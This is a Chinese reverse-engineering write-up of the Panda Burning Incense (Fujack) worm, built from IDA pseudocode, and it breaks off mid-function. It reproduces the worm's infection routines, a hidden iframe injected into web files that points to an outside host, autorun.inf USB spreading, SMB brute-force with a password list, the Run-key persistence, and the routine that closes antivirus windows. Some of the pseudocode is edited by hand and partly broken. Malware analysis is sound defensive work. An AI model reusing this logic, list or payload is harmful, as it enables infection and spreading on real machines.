1. 样本概况
该熊猫烧香加有fsg壳,利用局域网传播,感染主机可执行文件。
1.1 样本信息
病毒名称:xiongmao.vir
所属家族:Fujack
MD5值:512301c535c88255c9a252fdf70b7a03
SHA1值:ca3a1070cff311c0ba40ab60a8fe3266cfefe870
CRC32:E334747C
病毒行为:设置注册表实现自启动,向系统服务发送控制码,创建文件扩展名为exe的html文件,创建一个微改过的拷贝,修改资源管理器(explorer)的文件夹的隐藏属性,将文件属性设置为隐藏,检测系统内存大小,可能通过内存大小来判断是否运行在虚拟机中,在文件系统上创建可执行文件。
1.2 测试环境及工具
Win7 32位虚拟机,IDA,010editor,OllyDebug,exeinfo,LoadPE.
1.3 分析目标
2.具体行为分析
2.1 主要行为
火绒检测:
感染后文件:
比较被感染的可执行文件:
流程图
2.2 恶意代码分析
熊猫烧香是Delphi程序,需要注意:
IDA导入bds symbol。
Delphi默认的调用约定是,从右往左传参,前三个参数分别用寄存器 eax,edx,ecx ,超过三个的放在堆栈中,被调用者平衡堆栈。
Delphi也是可以内联汇编的。(asm...end...)
字符串类型分为P(Pascal字符串),A(Ansi字符串),L
其他经验
- 主要函数的分析时,可以暂时忽略返回值eax没有被保存或使用的调用。
- mov 的目的地址是内存地址时需要重点关注。
2.3 恶意程序的代码分析片段
(1)sub_405250 解密
参数是两个字符串eax,edx,一个缓冲区ecx。
功能是把eax通过edx解密后放入ecx。
if ( pStrKey ) /*pStrKEy is valid*/
{
int lenthofStrKey = GetpascalStrLenth(pStrKey); /*key length*/
if ( lenthofStrKey > 0 )
{
int i = 1;
int XorValue = 0;
do
{
lenthofStrXboy = GetpascalStrLenth(pStrXboy);
XorValue =(strXboy[i % 4d] % 10d) ^ (strKey[i-1])
stosbEax2Edx(
10, /* always 10 */
XorValue, /* the XorValue */
&BufftoSaveXorValue/* buff to save XorValue */);
LStrCat((char **)&decryptedStrBuff, BufftoSaveXorValue);
++i;
--lenthofStrKey;
}
while ( lenthofStrKey );
}
/*save the _Out_ parameter*/
System::__linkproc__ LStrAsg(OutputDecryptedStr, decryptedStrBuff);
}
需要查一下 stosbEax2Edx
三个主函数都没有参数
(2)sub_40819C 释放备份
Delphi 函数特点 eax是传入参数,用 mov 取值,edx 是传出参数,用 lea 取地址。
复制文件到新的目录:
运行新文件,并退出当前进程:
第一次运行
会在 系统目录 C:/Windows/System32/drivers 下 创建 病毒文件的拷贝 spo0lsv.exe 并运行,然后退出。
int main(){
ParamStr(this, (char *)&v75); /*
** ParamStr(int index,_Out_ char* retValue);
** return the index number of param in commandLine;
** eax = 0 ,edx = &var_238 = pathofVirusFile;
*/
/* GetAppPath is to get the ./ of the Path _In_ */
GetAppPath(pathofVirusFile_0, &dirofVirusFile);
LStrCat((char **)&dirofVirusFile, "Desktop_.ini");
if (FileExists(dirofVirusFile_afterStrcat) )/*if Desktop_.ini is exist? 0 is not exist.*/
{
System::ParamStr(pathofVirusFile_1, (char *)&v73);
GetAppPath(v4, &v74);
LStrCat((char **)&v74, "Desktop_.ini");
v5 = (const CHAR *)LStrToPChar();
j_SetFileAttributesA(v5, 0x80u);
j_Sleep(1u);
System::ParamStr(v6, (char *)&v71);
GetAppPath(v7, &v72);
System::__linkproc__ LStrCat((char **)&v72, "Desktop_.ini");
v8 = (const CHAR *)System::__linkproc__ LStrToPChar();
j_DeleteFileA(v8);
}
ParamStr(pathofVirusFile_1, (char *)&v70);
/*
** ReadVirusFileToAnsiStr(_In_ AnsiString filePath,_Out_ char* pFileStr)
** var_1 = pFileStr
** maybe get more information.but out to param is only pFileStr
*/
ReadVirusFileToAnsiStr(pathofVirusFile_2, &pFileStr);/*Also read Import dir to memory */
LStrClr();
for ( i = GetpascalStrLenth(pFileStr); i > 0 && *(_BYTE *)(pFileStr + i - 1); --i )// skip
{
v12 = pFileStr;
LOBYTE(v12) = *(_BYTE *)(pFileStr + i - 1);
stosbEax2Edx(pathofVirusFile_3, v12, (char **)&v69);
LStrCat3(Always0, v69);
}
if ( !Always0 ) /*in*/
{
ParamStr(pathofVirusFile_3, (char *)&v67);
AnsiUpperCase(pathofVirusFile_3Upper);
GetDir_System32(v68, v52);
LStrCatN(dirSystem32, (char *)3, "spo0lsv.exe", "drivers\\", v65);
AnsiUpperCase(v15);
LStrCmp((int)IsFalse, v66); /* to confirm which exe is running*/
if ( !v16 ) /*if mot spo0lsv.exe*/
{
sub_405FC4(); /*use Tlhelp enume process;search spo0lsv.exe*/
sub_405FC4();
GetDir_System32(128, v52);
System::__linkproc__ LStrCatN(dirSystem32_1, (char *)3, "spo0lsv.exe", "drivers\\", v64);
v18 = (const CHAR *)System::__linkproc__ LStrToPChar();
j_SetFileAttributesA(v18, (DWORD)IsFalse);
j_Sleep(1);
GetDir_System32(0, v52);
LStrCatN(dirSystem32_2, (char *)3, "spo0lsv.exe", "drivers\\", v63);
NewFileName = (const CHAR *)System::__linkproc__ LStrToPChar();
ParamStr(pathofVirusFile_4, (char *)&v62);
ExistingFileName = (const CHAR *)System::__linkproc__ LStrToPChar();
j_CopyFileA(ExistingFileName, NewFileName, (BOOL)IsFalse);
GetDir_System32(1, v52);
LStrCatN(dirSystem32_3, (char *)3, "spo0lsv.exe", "drivers\\", v61);
v23 = (const CHAR *)System::__linkproc__ LStrToPChar();
j_WinExec(v23, (UINT)IsFalse);
j_ExitProcess_0(0);
}
}
}
FileExist(char* Name) return a boolean, TRUE is exist, FALSE is not existing.
第二次执行 即 spolsv.exe 执行
int __thiscall sub_40819C(void *this)
{
System::ParamStr(this);
unknown_libname_89(v1, &v79);
System::__linkproc__ LStrCat(v2, "Desktop_.ini");
System::ParamStr(v4);
sub_407650(v12, &v85);
System::__linkproc__ LStrClr();
if ( !v84 )
{
System::ParamStr(v13);
Sysutils::AnsiUpperCase(v16);
sub_4053AC(v75);
System::__linkproc__ LStrCatN(v17, 3, "spo0lsv.exe", "drivers\\", v73);
Sysutils::AnsiUpperCase(v18);
System::__linkproc__ LStrCmp(v19, v74); //exist
if ( !v20 ) //pass it
{/*...*/}
}
v30 = unknown_libname_75(v84);
LStrDelete(v30, i); // delete virusfile memory image, but haven't delete it
v49 = unknown_libname_77(v48, v84);
if ( v49 > 0 )
{/*...*/}
v51 = v63;
v63 = (int *)&loc_408788;
LStrArrayClr(v51, 29);
return LStrArrayClr(v52, 5);
}
(3.1)sub_40D18C 主体1 感染文件
Fun2 是一个递归函数,要遍历所有文件
对 Desktop_.ini 的修改
很多的 if 其实改成 for 循环 遍历字符串数组就没这么麻烦了
int __usercall v_EnumeFiles@<eax>(int a1@<eax>)
{
lenthofDriver = GetpascalStrLenth((int)DriverPath);
if ( DriverPath[lenthofDriver - 1] != '\\' )
System::__linkproc__ LStrCat(&DriverPath, "\\");// add '\\'
System::__linkproc__ LStrCat3("*.*", DriverPath, filePath, v155, Is3);// add *.*
if ( !Sysutils::FindFirst(&v249, 63) )
{
while ( (v250 & 0x10) == 0x10 && *(_BYTE *)PathName != '.' )
{
LStrCmp(v4, *(int *)v246);// "WINDOWS"
if ( IstheSame )
goto _FindNext;
LStrCmp(v8, *(int *)v244);// "WINNT"
if ( IstheSame )
goto _FindNext;
LStrCmp(v11, *(int *)v242);// "system32"
if ( IstheSame )
goto _FindNext;
LStrCmp(v14, *(int *)v240);// "Documents and Settings"
if ( IstheSame )
goto _FindNext;
LStrCmp(v17, *(int *)v238);// "System Volume Information"
if ( IstheSame )
goto _FindNext;
LStrCmp(v20, *(int *)v236);// "System Volume Information"
if ( IstheSame )
goto _FindNext;
LStrCmp(v23, *(int *)v234);// "Recycled"
if ( IstheSame )
goto _FindNext;
LStrCmp(v26, *(int *)v232);// "Windows NT"
if ( IstheSame )
goto _FindNext;
LStrCmp(v29, *(int *)v230);// "WindowsUpdate"
if ( IstheSame )
goto _FindNext;
LStrCmp(v32, *(int *)v228);// "Windows Media Player"
if ( IstheSame )
goto _FindNext;
LStrCmp(v35, *(int *)v226);// "Outlook Express"
if ( IstheSame )
goto _FindNext;
LStrCmp(v38, *(int *)v224);// Internet Explorer
if ( IstheSame )
goto _FindNext;
LStrCmp(v41, *(int *)v222);// "NetMeeting"
if ( IstheSame )
goto _FindNext;
LStrCmp(v44, *(int *)v220);// "NetMeeting"
if ( IstheSame )
goto _FindNext;
LStrCmp(v47, *(int *)v218);// "Common Files"
if ( IstheSame )
goto _FindNext;
LStrCmp(v50, *(int *)v216);// "ComPlus Applications"
if ( IstheSame )
goto _FindNext;
LStrCmp(v53, *(int *)v214);// Common Files"
if ( IstheSame )
goto _FindNext;
LStrCmp(v56, *(int *)v212);// "Messenger"
if ( IstheSame )
goto _FindNext;
LStrCmp(v59, *(int *)v210);// "InstallShield Installation Information"
if ( IstheSame )
goto _FindNext;
LStrCmp(v62, *(int *)v208);// "MSN"
if ( IstheSame )
goto _FindNext;
LStrCmp(v65, *(int *)v206);// "Microsoft Frontpage"
if ( IstheSame )
goto _FindNext;
LStrCatN(v67, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);// if desktop_.ini is exist
if ( !(unsigned __int8)Sysutils::FileExists(v68) )// not exist then in
{
LStrCatN(v69, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
j_SetFileAttributesA(v89, v90);
j_Sleep(1u);
j_GetLocalTime(&SystemTime);
sub_40576C(v91);/*获得时间年,月,日*/
sub_40576C(v92);
v93 = v199;
sub_40576C(v94);
LStrCatN(v95, (char *)5, (char *)v198, dword_40A3D0, v93);
LStrCatN(v96, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
ShowSQLWindow(v97, v197);/*修改desktop.ini文件,放入当日时间*/
j_SetFileAttributesA(v99, v100);/*修改desktop.ini属性*/
j_Sleep(1u);
LABEL_32:
LStrCat3(PathName, DriverPath, filePath, v155, Is3);
v_EnumeFiles(v196); /*this is a recursion 递归*/
LABEL_59:
j_Sleep(0x14u);
goto _FindNext;
} // exist then
LStrCatN(v69, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
ReadFileToAnsiStr(v70, &v253);
j_GetLocalTime(&SystemTime); // get 0000 0000 0000 0000 0000 0000 0000 0000
// month year day min(x0)min(0x) hour second
sub_40576C(v71);//获得时间年,月,日
sub_40576C(v72);
v73 = v205;
sub_40576C(v74);
LStrCatN(v75, (char *)5, v204, dword_40A3D0, v73);/* make date of virus run. like 2003-9-11 */
LStrCmp(v253, v252); // compare the desktop_.ini end string with this date
if ( !IstheSame )
{
LStrCatN(v76, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
j_SetFileAttributesA(v77, v78);
j_Sleep(1u);
j_GetLocalTime(&SystemTime);
LStrCatN(v83, (char *)5, v201, dword_40A3D0, v81);
LStrCatN(v84, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
Mxdsql::ShowSQLWindow(v85, v200);
LStrCatN(v86, (char *)3, "\\Desktop_.ini", (char *)PathName, DriverPath);
j_SetFileAttributesA(v87, v88);
j_Sleep(1u);
goto LABEL_32;
}
LStrCat3(PathName, DriverPath, filePath, v155, Is3);
EnumeDir(v203); /*like a while, if in the same date, never out */
_FindNext:
if ( Sysutils::FindNext((int)&v249) )
goto _FindClose;
}/*end while*/
if ( *(_BYTE *)PathName != '.' ) /*do something on files*/
{
getfilesuffix(v3, &v194); /*get filename suffix*/
LStrCmp(v195, (int)"GHO");/*if is .gho, delete file*/
if ( IstheSame )
{
j_DeleteFileA(v102);
}
System::__linkproc__ LStrCat3(PathName, DriverPath, filePath, v155, Is3);
if ( getFilesize(filePath) < 10485760 )
{
LStrCmp(v104, *(int *)v192);// "setup.exe"
if ( IstheSame )
goto _FindNext;
LStrCmp(v107, *(int *)v190);// "NTDETECT.COM"
if ( IstheSame )
goto _FindNext;
getfilesuffix(v109, &v188);
LStrCmp(v111, *(int *)v187);// .exe
if ( IstheSame )
{
InfectionExe();
}
getfilesuffix(v113, &v185);
LStrCmp(v115, *(int *)v184);// .scr
if ( IstheSame )
{
InfectionExe();
}
getfilesuffix(v117, &v182);
LStrCmp(v119, *(int *)v181);// .pif
if ( IstheSame )
{
InfectionExe();
}
getfilesuffix(v121, &v179);
LStrCmp(v123, *(int *)v178);// .com
if ( IstheSame )
{
InfectionExe();
}
getfilesuffix(v125, &v176);
LStrCmp(v127, *(int *)v175);// .htm
if ( IstheSame )
{
InfectScript();
}
getfilesuffix(v129, &v173);
LStrCmp(v131, *(int *)v172);// .html
if ( IstheSame )
{
InfectScript();
}
getfilesuffix(v133, &v170);
LStrCmp(v135, *(int *)v169);// .asp
if ( IstheSame )
{
InfectScript();
}
getfilesuffix(v137, &v167);
LStrCmp(v139, *(int *)v166);// .php
if ( IstheSame )
{
InfectScript();
}
getfilesuffix(v141, &v164);
LStrCmp(v143, *(int *)v163);// .jsp
if ( IstheSame )
{
InfectScript();
}
getfilesuffix(v145, &v161);
LStrCmp(v147, *(int *)v160);// .aspx
if ( IstheSame )
{
InfectScript();
}
}
}
goto LABEL_59;
}
_FindClose:
Sysutils::FindClose();
__writefsdword(0, (unsigned int)filePath);
v149 = v159;
__writefsdword(0, v157);
v159 = (int *)&loc_40A1A0;
System::__linkproc__ LStrArrayClr(v149, 99);
System::__linkproc__ LStrClr();
System::__linkproc__ LStrClr();
System::__linkproc__ LStrArrayClr(v150, 9);
System::__linkproc__ FinalizeRecord(v151, &byte_407494);
return System::__linkproc__ LStrArrayClr(v152, 3);
}
感染可执行文件
回收站的编号 S-1-5-21-2427704308-2084052474-1429875048-1000
int __usercall InfectionExe@<eax>(int a1@<eax>, int a2@<ebx>, int a3@<edi>, int a4@<esi>)
{
originalName = 0;
signal0x1 = 0x1;
getFileName(v4, &v37);
if ( (unsigned __int8)sub_4077B4() )
{
__writefsdword(0, v24);
}
else
{
Randomize();
ParamStr(v5, v36);
LStrCmp(v41, *(int *)v36);/*judge if is the running exe(virus)*/
if ( v6 )
{
__writefsdword(0, v24);
}
else
{
ReadFileToAnsiStr(v41, (char **)&originalFileName, a2, a3, a4);
if ( originalFileName )
{
if ( LStrPos(v7, originalFileName) <= 0 )// whboy, judge if is infected
{
j_SetFileAttributesA(v8, v9);
j_Sleep(1u);
ParamStr(v10, v35);
if ( j_CopyFileA(v11, v12, v13) ) /*copy running virus to file*/
{
getFileName(v14, &v34);
GetpascalStrLenth(originalName);
sub_40576C(v15); /* get oringinal file content*/
LStrCatN(v16, (char *)6, "\x01", v33, dword_40818C);
LStrLAsg(v17, originalName);
Assign(v18, v41);
byte_40E00C = 2;
Append();
_IOTest(v24, v25, v26);
fwirte(v19, v39);
Flush();
_IOTest(v24, v25, v26);
fwirte(v20, signal0x1);
Flush();
_IOTest(v24, v25, v26);
Close();
_IOTest(v24, v25, v26);
__writefsdword(0, v24);
}
else
{
__writefsdword(0, v24);
}
}
else
{
__writefsdword(0, v24);
}
}
else
{
__writefsdword(0, v24);
}
}
}
__writefsdword(0, v27);
}
感染脚本
key :search
encrypted:
3D 6E 62 7B 65 6E 64 27 77 7B 67 3E 69 73 70 79 | =nb{end'w{g>ispy
3E 2C 2E 70 73 7E 2A 62 62 3F 32 27 67 6D 2E 31 | >,.ps~*bb?2'gm.1
32 26 6D 6D 65 62 7C 27 6C 77 6C 27 73 60 60 77 | 2&mmeb|'lwl's``w
69 3A 26 39 26 23 69 62 6D 6E 6C 77 3C 25 34 2B | i:&9&#ibmnlw<%4+
A 3F 2E 6E 62 7B 65 6E 64 39 | :?.nb{end9
decrypted:
3C 69 66 72 61 6D 65 20 73 72 63 3D 68 74 74 70 | <iframe src=http
3A 2F 2F 77 77 77 2E 61 63 38 36 2E 63 6E 2F 36 | ://www.ac86.cn/6
36 2F 69 6E 64 65 78 2E 68 74 6D 20 77 69 64 74 | 6/index.htm widt
68 3D 22 30 22 20 68 65 69 67 68 74 3D 22 30 22 | h="0" height="0"
3E 3C 2F 69 66 72 61 6D 65 3E | ></iframe>
感染结果
int __usercall InfectScript@<eax>(int a1@<eax>, int a2@<ebx>, int a3@<edi>, int a4@<esi>)
{
malLink = 0;/*ebp-0x8*/
ReadFileToAnsiStr(v22, (char **)&filebuff, a2, a3, a4);
/*decrypted the hardcode in virusfile to malLink*/
decryptedFun((int)&byte_407B04/*encrypted content*/,
(int)"Search"/*key*/, (volatile signed __int32 *)&malLink);
if ( !LStrPos(malLink, filebuff) )
{
if ( FileExists(v5) )
{
FileOpen(v6, 1u);
setFilePoint(2u, 0, v7); /*set point to file's end*/
LStrCatN(v8, (char *)3, dword_407B64, dword_407B58, malLink);
length = (unsigned int)GetpascalStrLenth((int)malLink);
fwirteScript(v11, length);
CloseHandle();
}
}
}
(3.2)sub_40D18C 持久化
通过设置 autorun.inf,使任何点击磁盘自动运行 setup.exe,而该文件已被修改为病毒的copy。
void TimerFunc(void *a1, unsigned int a2, int a3)
{
_GetNumberofDiskDriver((char **)&bufofDiskName, v3, a1, a2, a3);
if ( !bufofDiskName ||
numberofDisks = GetpascalStrLenth(bufofDiskName) ||
numberofDisks < 1
){
return;
}
while ( 1 )// run the number of diskdriver, for z to a
{
i = numberofDisks - 1;
if (LStrPos(bufofDiskName[i], "A") )/*A:*/
{
break;
}
if ( __linkproc__ LStrPos(bufofDiskName[i], "B") )/*B:*/
{
break;
}
LStrCat3(":\\setup.exe", LStrPos(bufofDiskName[i], buff1, 2);
LStrCat3(":\\autorun.inf", LStrPos(bufofDiskName[i], buff2, 2);
if ( FileExists(v19) )/* examine if setup.exe is exist*/
{ // is exist
System::ParamStr(v20, v58);
readfile_(*(int *)v58, (char **)&bufofvirus, numberofDisks, a2, a3);
readfile_(v68, (char **)&bufofSetupExe, numberofDisks, a2, a3);
LStrCmp(bufofvirus, bufofSetup.exe);/*examine if the setup.exe is virus file*/
if ( !v22 ) /*not same delete oringnal file then copy virus to it*/
{
j_SetFileAttributesA((LPCSTR)a3, (DWORD)v49);
if ( !j_DeleteFileA((LPCSTR)a3) )
{
continue;
}
if ( !j_CopyFileA(v26, v48, (BOOL)v49) )
{
continue;
}
}
}
else
{ /*if setup.exe is not exist copy the runing file to setup.exe*/
ParamStr(0, buff);
if ( !j_CopyFileA(v29, v48, (BOOL)v49) ) /* copy virus to setup.exe*/
{
continue;
}
} /*end setup.exe if*/
if (!FileExists(v21))/*examine if autorun.inf is exist*/
{ /*not exist*/
LStrToPChar(0x40000000, 0, 0, 2, 0, 0);
hFile = j_CreateFileA_0(/*...*/);
j_CloseHandle_0(hFile);
/* modify the autorun.inf*/
fwirte(v37,
"[AutoRun]\r\n
OPEN=setup.exe\r\n
shellexecute=setup.exe\r\n
shell\\Auto\\command=setup.exe\r\n"
);
}
else
{/*is exist*/
readfile_(v69, (char **)&v65, numberofDisks, a2, a3);
ret = LStrCmp(
v65,
(int)"[AutoRun]\r\n
OPEN=setup.exe\r\n
shellexecute=setup.exe\r\n
shell\\Auto\\command=setup.exe\r\n");
if (!ret)
{
continue; /*if has the same content to setup.exe break*/
}
else
{/*not the same delte the oringinal and create a new one*/
j_SetFileAttributesA((LPCSTR)a3, (DWORD)v49);
if ( j_DeleteFileA((LPCSTR)a3) )
{
v31 = j_CreateFileA_0((LPCSTR)a3, 0x40000000u, 0, 0, 2u, 0, 0);
j_CloseHandle_0(v31);
fwirte(v33,
"[AutoRun]\r\n
OPEN=setup.exe\r\n
shellexecute=setup.exe\r\n
shell\\Auto\\command=setup.exe\r\n"
);
}
else
{
continue;
}
}
}
j_SetFileAttributesA(v39, 0x7); /*set setup.exe file attribute 0x7*/
j_SetFileAttributesA(v40, 0x7); /*set autorun.inf file attribute 0x7*/
if ( !--numberofDisks ) break;
} // end while
}
(3.3)网络传播
尝试连接
void __usercall sub_40B864(int a1@<eax>)
{
while ( 1 )
{
while ( !j_InternetGetConnectedState(0, 0) )
j_Sleep(1000u);
sub_40B520(v18, v1); // copy ip to mem in 4 dword
j_socket(FWP_AF_ETHER, IRDA_PROTO_SOCK_STREAM, IPPROTO_TCP);
name.sa_family = 2;
name.sa_data[0] = j_htons(139u);
name.sa_data[2] = j_inet_addr(v4);
if ( j_connect(v2, &name, 16) == -1 )
{
j_socket(2, 1, 6);
name.sa_family = 2;
name.sa_data[0] = j_htons(445u);
name.sa_data[2] = j_inet_addr(v7);
if ( j_connect(v5, &name, 16) != -1 )
{
j_closesocket(v5);
sub_40B40C(v18, *(_DWORD *)(v18 + 24));
}
}
else
{
j_closesocket(v2);
sub_40B40C(v18, *(_DWORD *)(v18 + 24));
}
j_Sleep(0x200u);
}
}
暴力破解
int __usercall sub_40B40C@<eax>(int a1@<eax>, int a2@<edx>)
{
/*网络连接结构体的初始化*/
NetResource.dwScope = 1;
NetResource.dwType = 0;
NetResource.lpLocalName = 0;
NetResource.lpRemoteName = LStrToPChar()
NetResource.lpProvider = 0;
j_GetModuleHandleA_0(0); /*get handle of virus' main module */
if ( sub_40A7F4() )
{
nUsrName = 3;
nPasswd = 101;
}
else
{
nUsrName = 0;
nPasswd = 0;
}
i = nUsrName + 1;/*4 is num of usrname*/
usrname = &arryUserName; /*addr of arry[3] which save usrname*/
while ( i )
{
j = nPasswd + 1;/*102 is num of passwd*/
passwd = &arryPasswd;
while ( j )
{
if ( !j_WNetAddConnection2A(&NetResource, *passwd[j], *usrname[i], dwFlag) )
{
webInfection(v29);
}
j_WNetCancelConnectionA(NetResource.lpRemoteName, -1);
passwd ++;
--j;
}
++usrname;
--i;
}
return;
}
Passwd:
1234:password:6969:harley:123456:golf:pussy:mustang
1111:shadow:fish:5150:7777:qwerty:baseball:2112:
letmein:12345:ccc:admin:5201314::1:12:123
1234567:123456789:654321:54321:111:000000:abc:pw
11111111:88888888:pass:passwd:data::abcd:abc123:sybase
123qwe:server:computer:520:super:123asd:0:ihavenopass:godblessyou
enable:xp:2002:2003:2600:alpha:110:111111
121212:123123:1234qwer:123abc:007:aaa:patrick:pat:administrator
root:sex:god:fuckyou:fuck:test:test123:temp:
temp123:win:asdf::qwer:yxcv:zxcv:home:xxx
owner:login:Login:pw123:love::mypc123::mypass::901100
Usrname:
Administrator:Guest:admin:Root
IDA 设置函数形式:
int __usercall webInfection@<eax>(int a1@<eax>, int a2@<ebx>, int a3@<edi>, int a4@<esi>)
ADMIN$是管理共享,默认指向系统文件夹(如 C:\WINDOWS);IPC$ 是 IPC 管道,用于远程系统管理;C$、D$ 等以盘符开头的共享指向盘符根目录,如 C:\、D:\ 。
// write access to const memory has been detected, the output may be wrong!
int __usercall webInfection@<eax>(int a1@<eax>)
{
GetMem(260);
while ( v53 == 234 );
{
while ( v41 );
{
while ( 1 )
{
LABEL_26:
++v40;
if ( !--v46 )
goto LABEL_27;
}
sub_404610(v5, (int)&lpNewFileName, v49);
v25 = lpNewFileName;
v24 = "\\";
LStrCatN(v8, (char *)5, "GameSetup.exe", *v40, v50);
GetDir_System32(v9, (int)v26);
LStrCatN(v10, (char *)3, "spo0lsv.exe", "drivers\\", v36);
j_CopyFileA(v11, v25, (BOOL)v26);// copy virus to shareDir ADMIN$ is C:/WINDOWS
GetMem(1025);
GetMem(257);
GetMem(16);
GetMem(4); // alloc 4 page of mem
LStrCatN(v14, (char *)5, "GameSetup.exe", *v40, v50);
sub_40A608(v16);// jmp 74B06C01h 然后就崩了
v44 = 1000 * (60 * *(_DWORD *)(v42 + 12) + 3600 * *(_DWORD *)(v42 + 8));
v18 = *(_DWORD *)(v42 + 24);
if ( v18 != -1 )
v44 -= 60000 * v18;
v44 += 120000;
if ( (unsigned int)v44 > 0x5265C00 )
v44 -= 86400000;
if ( sub_40A7F4() )
v0(v42);
*(_DWORD *)v1 = v44;
*(_DWORD *)(v1 + 4) = 0;
*(_BYTE *)(v1 + 8) = 0;
*(_DWORD *)(v1 + 12) = v3;
*(_BYTE *)(v1 + 9) = 1;
sub_40A600(v2, v1, (int)&v43);
FreeMem();
FreeMem();
FreeMem();
if ( v19 )
{
dword_40E0EC = 1;
if ( v45 != 1 && !(unsigned __int8)sub_4050C0(v5, v50) )
{
LStrCatN(v20, (char *)3, v50, "\\", v33);
v_EnumeFiles(v34, v1, v2, v3);/*感染文件的函数*/
}
}
if ( *(_DWORD *)(v47 + 4) != 1 )
v47 += 12;
if ( v45 == 1 )
break;
--v41;
}
}
FreeMem();
return;
}
sub_40A608(v16);// jmp 74B06C01h 然后就崩了
v44 = 1000 * (60 * *(_DWORD *)(v42 + 12) + 3600 * *(_DWORD *)(v42 + 8));
v18 = *(_DWORD *)(v42 + 24);
if ( v18 != -1 )
v44 -= 60000 * v18;
v44 += 120000;
if ( (unsigned int)v44 > 0x5265C00 )
v44 -= 86400000;
if ( sub_40A7F4() )
v0(v42);
*(_DWORD *)v1 = v44;
*(_DWORD *)(v1 + 4) = 0;s
*(_BYTE *)(v1 + 8) = 0;
*(_DWORD *)(v1 + 12) = v3;
*(_BYTE *)(v1 + 9) = 1;
sub_40A600(v2, v1, (int)&v43);//这个地址也不对 73BA19D1h
(4)sub_40819C 几个小TimeFunc
(4.1) sub_40CEE4 修改注册表 根据窗口关闭安全软件
void __stdcall sub_40CEE4()
{
sub_406E2C();
GetDir_System32(v3, (int)v4);
LStrCatN(v0, (char *)3, "spo0lsv.exe", "drivers\\", v6);
v1 = LStrToPChar(v3, v4, v5, v6, v7, savedregs);
/* 把spo0lsv.exe加入自启动 */
sub_4051BC("svcshare", "Software\\Microsoft\\Windows\\CurrentVersion\\Run", v1);
sub_4059F0(0,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue");
}
关闭安全软件
int __stdcall sub_4061B8()
{
sub_406108();/*获得管理员权限*/
v0 = 0;
v1 = j_GetDesktopWindow();
do
{
j_FindWindowExA(v1, v0, 0, 0);
j_GetWindowTextA(v0, &String, 101);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("防火墙", v45) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("进程", v44) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("VirusScan", v43) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("NOD32", v42) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("网镖", v41) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("杀毒", v40) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("毒霸", v39) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("瑞星", v38) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("江民", v37) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("超级兔子", v36) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("优化大师", v35) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("木马清道夫", v34) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("木馬清道夫", v33) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("卡巴斯基反病毒", v32) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("Symantec AntiVirus", v31) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("Duba", v30) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("esteem procs", v29) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("绿鹰PC", v28) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("密码防盗", v27) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("噬菌体", v26) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("木马辅助查找器", v25) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("System Safety Monitor", v24) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("Wrapped gift Killer", v23) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("Winsock Expert", v22) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("游戏木马检测大师", v21) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("超级巡警", v20) )
j_PostMessageA(v0, WM_QUIT, 0, 0);
}
while ( v0 );
j_GetDesktopWindow();
do
{
v3 = j_FindWindowExA(v2, v0, 0, 0);
v0 = v3;
v4 = j_FindWindowExA(v3, 0, "msctls_statusbar32", 0);
v5 = j_FindWindowExA(v4, 0, 0, 0);
j_GetWindowTextA(v5, &String, 101);
unknown_libname_143(101, &String);
if ( __linkproc__ LStrPos("pjf(ustc)", v19) )
{
j_PostMessageA(v0, WM_QUIT, 0, 0);
